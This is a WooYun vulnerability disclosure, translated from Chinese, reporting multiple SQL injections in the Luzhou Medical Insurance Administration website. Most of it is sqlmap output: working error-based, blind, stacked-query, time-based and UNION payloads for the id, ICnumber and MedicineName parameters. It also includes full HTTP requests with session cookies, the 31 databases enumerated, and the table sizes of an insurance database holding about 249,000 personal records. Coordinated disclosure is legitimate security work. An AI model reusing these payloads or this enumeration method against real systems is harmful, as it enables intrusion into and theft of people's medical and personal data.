WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
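2015-11-01: Details reported to the vendor; awaiting vendor response
2015-11-05: Vendor confirmed; details disclosed to the vendor only
2015-11-15: Details disclosed to core white hats and experts in related fields
2015-11-25: Details disclosed to regular white hats
2015-12-05: Details disclosed to intern white hats
2015-12-20: Details disclosed to the public
Multiple SQL injections in the Luzhou Medical Insurance Administration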
http://**.**.**.**/lookup/yibaoht/user/loadinghos.asp?id=
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: id=-3437 OR 2039=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2039=2039) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(120)+CHAR(113)))
---
[12:12:19] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[12:12:19] [INFO] fetching database names
[12:12:19] [WARNING] reflective value(s) found and filtering out
[12:12:19] [INFO] the SQL query used returns 31 entries
available databases [31]:
[*] aixin_data_store
[*] CemeteryManage
[*] chuanguoyuxi
[*] dpf_data
[*] ft1588
[*] fya-cic
[*] gjgl_ddb_store
[*] gushumingmu
[*] gzjmyy
[*] jhhs
[*] jingjishangcheng
[*] jisi
[*] jyqzzb
[*] ljdqSys
[*] lzggys
[*] lzljpyx
[*] lzppq
[*] lzSanitation
[*] lzsry
[*] lzswzzb
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] science#_data_store
[*] scrsy
[*] tempdb
[*] ydjyySys
[*] yibao
[*] yiw9
http://**.**.**.**/lookup/yibaoht/user/grxx.htm
POST /lookup/yibaoht/user/grxx.asp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://**.**.**.**/lookup/yibaoht/user/grxx.htm
Cookie: Forcast2004%2D0001=ViewUrl=Admin%5Flogin%2Easp&KEY=&purview=&UserName=&reglevel=&fullname=; ASPSESSIONIDCCDRQSTQ=LDMBNFBCEAADOEAGKNJIPHFD; ASPSESSIONIDCCAQSTSQ=HIFJLJBCGOBOJFCNKJADCBCI; ASPSESSIONIDAAAQTSSQ=NHPJDLBCMNEHDJPDDIFBKCAF; ASPSESSIONIDCAATSTSQ=KAMLPMBCJLFJFJHGLIOIMFMA
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 43

Sfzmhm=xxxxxxxxxxxxx&ICnumber=xxxxxxxxxxxxx
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ICnumber (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Sfzmhm=xxxxxxxxxxxxx&ICnumber=xxxxxxxxxxxxx'+(SELECT 'Qjza' WHERE 5313=5313 AND 7943=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7943=7943) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(120)+CHAR(98)+CHAR(113))))+'
---
[12:13:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[12:13:49] [INFO] fetching database names
[12:13:49] [INFO] the SQL query used returns 31 entries
available databases [31]:
[*] aixin_data_store
[*] CemeteryManage
[*] chuanguoyuxi
[*] dpf_data
[*] ft1588
[*] fya-cic
[*] gjgl_ddb_store
[*] gushumingmu
[*] gzjmyy
[*] jhhs
[*] jingjishangcheng
[*] jisi
[*] jyqzzb
[*] ljdqSys
[*] lzggys
[*] lzljpyx
[*] lzppq
[*] lzSanitation
[*] lzsry
[*] lzswzzb
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] science#_data_store
[*] scrsy
[*] tempdb
[*] ydjyySys
[*] yibao
[*] yiw9
http://**.**.**.**/lookup/yibaoht/user/admin_index.htm
POST /lookup/yibaoht/user/ypshow.asp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://**.**.**.**/lookup/yibaoht/user/ypshow.asp
Cookie: Forcast2004%2D0001=ViewUrl=Admin%5Flogin%2Easp&KEY=&purview=&UserName=&reglevel=&fullname=; ASPSESSIONIDCCDRQSTQ=LDMBNFBCEAADOEAGKNJIPHFD; ASPSESSIONIDCCAQSTSQ=HIFJLJBCGOBOJFCNKJADCBCI; ASPSESSIONIDAAAQTSSQ=NHPJDLBCMNEHDJPDDIFBKCAF; ASPSESSIONIDCAATSTSQ=KAMLPMBCJLFJFJHGLIOIMFMA; ASPSESSIONIDACBSSTSR=NLLBJPBCOOIIIGDFEFHJDFEK
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

MedicineName=11&Submit=%B2%E9%D1%AF
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MedicineName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: MedicineName=11%' AND 8742=8742 AND '%'='&Submit=%B2%E9%D1%AF

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: MedicineName=11%' AND 8731=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8731=8731) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113))) AND '%'='&Submit=%B2%E9%D1%AF

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: MedicineName=11%';WAITFOR DELAY '0:0:5'--&Submit=%B2%E9%D1%AF

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: MedicineName=11%' AND 6086=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&Submit=%B2%E9%D1%AF

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: MedicineName=11%' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(113)+CHAR(87)+CHAR(80)+CHAR(86)+CHAR(81)+CHAR(83)+CHAR(117)+CHAR(77)+CHAR(120)+CHAR(86)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL-- &Submit=%B2%E9%D1%AF
---
[12:20:27] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[12:20:27] [INFO] fetching database names
[12:20:27] [INFO] the SQL query used returns 31 entries
available databases [31]:
[*] aixin_data_store
[*] CemeteryManage
[*] chuanguoyuxi
[*] dpf_data
[*] ft1588
[*] fya-cic
[*] gjgl_ddb_store
[*] gushumingmu
[*] gzjmyy
[*] jhhs
[*] jingjishangcheng
[*] jisi
[*] jyqzzb
[*] ljdqSys
[*] lzggys
[*] lzljpyx
[*] lzppq
[*] lzSanitation
[*] lzsry
[*] lzswzzb
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] science#_data_store
[*] scrsy
[*] tempdb
[*] ydjyySys
[*] yibao
[*] yiw9
Database: yibao
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| dbo.perinfo              | 249448  |
| dbo.unitlevylist_view    | 11748   |
| dbo.unitlevylist_view    | 11748   |
| dbo.Item                 | 4341    |
| dbo.medicine             | 3620    |
| dbo.peraccount           | 417     |
| dbo.perclinicdetail_view | 279     |
| dbo.perclinicdetail_view | 279     |
| dbo.Hospital             | 175     |
| dbo.perclinic_view       | 142     |
| dbo.perclinic_view       | 142     |
| dbo.perinhosdetail_view  | 81      |
| dbo.perinhosdetail_view  | 81      |
| dbo.unitlevv_view        | 19      |
| dbo.unitlevv_view        | 19      |
| dbo.unitlevv_view        | 19      |
| dbo.sysconstraints       | 8       |
| dbo.syssegments          | 3       |
| dbo.Yhb                  | 3       |
| dbo.perinhos_view        | 2       |
| dbo.perinhos_view        | 2       |
| dbo.TongZhi              | 1       |
+--------------------------+---------+
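Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-05 14:29
CNVD confirmed and reproduced the reported vulnerability and has handed it over to CNCERT to dispatch to the corresponding regional sub-center, which will follow up and coordinate with the organization that manages the website to handle it.
None yet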